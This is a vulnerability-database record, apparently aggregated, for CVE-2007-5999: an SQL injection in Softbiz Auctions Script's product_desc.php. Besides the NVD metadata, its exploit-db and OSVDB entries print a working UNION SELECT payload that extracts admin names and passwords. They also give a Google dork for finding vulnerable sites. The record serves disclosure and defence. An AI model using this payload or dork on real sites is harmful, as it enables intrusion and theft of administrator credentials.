ID CVE-2007-5999Type cveReporter NVDModified 2017-09-28T21:29:46
Description
SQL injection vulnerability in product_desc.php in Softbiz Auctions Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
{"id": "CVE-2007-5999", "bulletinFamily": "NVD", "title": "CVE-2007-5999", "description": "SQL injection vulnerability in product_desc.php in Softbiz Auctions Script allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2007-11-15T17:46:00", "modified": "2017-09-28T21:29:46", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5999", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/4617", "http://www.securityfocus.com/bid/26399", "https://exchange.xforce.ibmcloud.com/vulnerabilities/38399"], "cvelist": ["CVE-2007-5999"], "type": "cve", "lastseen": "2017-09-29T14:25:36", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:softbizscripts:softbiz_auctions_script"], "cvelist": ["CVE-2007-5999"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in product_desc.php in Softbiz Auctions Script allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 1, "enchantments": {}, "hash": "6219f6cd1bedca0ecfca8e46910bf86436dd30b316c5281a6c1d1a60c02b23b5", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "73e8445a1c43120b5a7a14a881eb1ea7", "key": "href"}, {"hash": "cab856d46d4f2eff95f956e6ffb3c19f", "key": "cvelist"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "ad10d0fc14e37f3b04252f4636daefef", "key": "description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "185e983aeb363e41f19be342326e4abd", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ac866fe6e5a04785c7cee0638118467e", "key": "references"}, {"hash": "64b539d3b5cde60b9166a44e150b285f", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b6edc112d5df2000b7af6f0670f690db", "key": "published"}, {"hash": "c54f6e2f6b987d9e98ca9af2fca4e1e9", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5999", "id": "CVE-2007-5999", "lastseen": "2016-09-03T09:46:20", "modified": "2008-09-05T17:32:08", "objectVersion": "1.2", "published": "2007-11-15T17:46:00", "references": ["http://www.milw0rm.com/exploits/4617", "http://www.securityfocus.com/bid/26399", "http://xforce.iss.net/xforce/xfdb/38399"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-5999", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T09:46:20"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:softbizscripts:softbiz_auctions_script"], "cvelist": ["CVE-2007-5999"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in product_desc.php in Softbiz Auctions Script allows remote attackers to execute arbitrary SQL commands via the id parameter.", "edition": 2, "enchantments": {}, "hash": "aea299fd46f9b706fd1e4d2d0cbd3d95172cecb19ccef1e520c473918fd9f4c9", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "40b9112ba87d763c9fb157d90df25608", "key": "references"}, {"hash": "73e8445a1c43120b5a7a14a881eb1ea7", "key": "href"}, {"hash": "cab856d46d4f2eff95f956e6ffb3c19f", "key": "cvelist"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "ad10d0fc14e37f3b04252f4636daefef", "key": "description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "185e983aeb363e41f19be342326e4abd", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6e0ca11f8a1d69f848f4446f30c55568", "key": "modified"}, {"hash": "64b539d3b5cde60b9166a44e150b285f", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b6edc112d5df2000b7af6f0670f690db", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5999", "id": "CVE-2007-5999", "lastseen": "2017-07-29T11:22:21", "modified": "2017-07-28T21:33:58", "objectVersion": "1.3", "published": "2007-11-15T17:46:00", "references": ["http://www.milw0rm.com/exploits/4617", "http://www.securityfocus.com/bid/26399", "https://exchange.xforce.ibmcloud.com/vulnerabilities/38399"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-5999", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-29T11:22:21"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "64b539d3b5cde60b9166a44e150b285f"}, {"key": "cvelist", "hash": "cab856d46d4f2eff95f956e6ffb3c19f"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "ad10d0fc14e37f3b04252f4636daefef"}, {"key": "href", "hash": "73e8445a1c43120b5a7a14a881eb1ea7"}, {"key": "modified", "hash": "1c3de1868542cd3ad9314d3a706ff9ac"}, {"key": "published", "hash": "b6edc112d5df2000b7af6f0670f690db"}, {"key": "references", "hash": "513a0da5628d417c84b00f5109cb2c9d"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "185e983aeb363e41f19be342326e4abd"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "84af99dfb6dbe3d43143158dde5f77d5baa33bc579a73e97a259e98e867915d1", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:25:36"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:softbizscripts:softbiz_auctions_script"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-01-31T21:21:18", "osvdbidlist": ["39733"], "references": [], "edition": 1, "description": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln. CVE-2007-5999. Webapps exploit for php platform", "reporter": "Khashayar Fereidani", "published": "2007-11-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5999"], "modified": "2007-11-11T00:00:00", "id": "EDB-ID:4617", "href": "https://www.exploit-db.com/exploits/4617/", "sourceData": "#####################################################################################\n#### Softbiz Auctions Script Sql Injection ####\n#### BY IRCRASH ####\n#####################################################################################\n# #\n# #\n#AUTHOR : IRCRASH (Dr.Crash) #\n#Script Download : http://www.softbizscripts.com/ #\n#Google Dork : \"Starting bid\" \"Powered by SoftbizScripts\" #\n# #\n# #\n#Injection Adress : http://sitename/product_desc.php?id=<SQL C0de> #\n# #\n#SQL C0de : 999999%20union/**/select/**/0,1,admin_name,3,4,5,6,7,8,9,10,pwd,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*\n# #\n# #\n#Our site : Ircrash.com #\n# #\n# #\n# TNX : GOD #\n#####################################################################################\n\n# milw0rm.com [2007-11-11]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4617/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "references": [], "description": "## Vulnerability Description\nSoftbiz Auctions Script contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'product_desc.php' script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/product_desc.php?id=999999%20union/**/select/**/0,1,admin_name,3,4,5,6,7,8,9,10,pwd,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/sbauctions_admin/*\n## References:\nVendor URL: http://www.softbizscripts.com/auctions-script-features.php\nISS X-Force ID: 38399\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4617\n[CVE-2007-5999](https://vulners.com/cve/CVE-2007-5999)\nBugtraq ID: 26399\n", "edition": 1, "reporter": "OSVDB", "published": "2007-11-11T00:00:00", "title": "Softbiz Auctions Script product_desc.php id Variable SQL Injection", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-5999"], "modified": "2007-11-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39733", "id": "OSVDB:39733", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
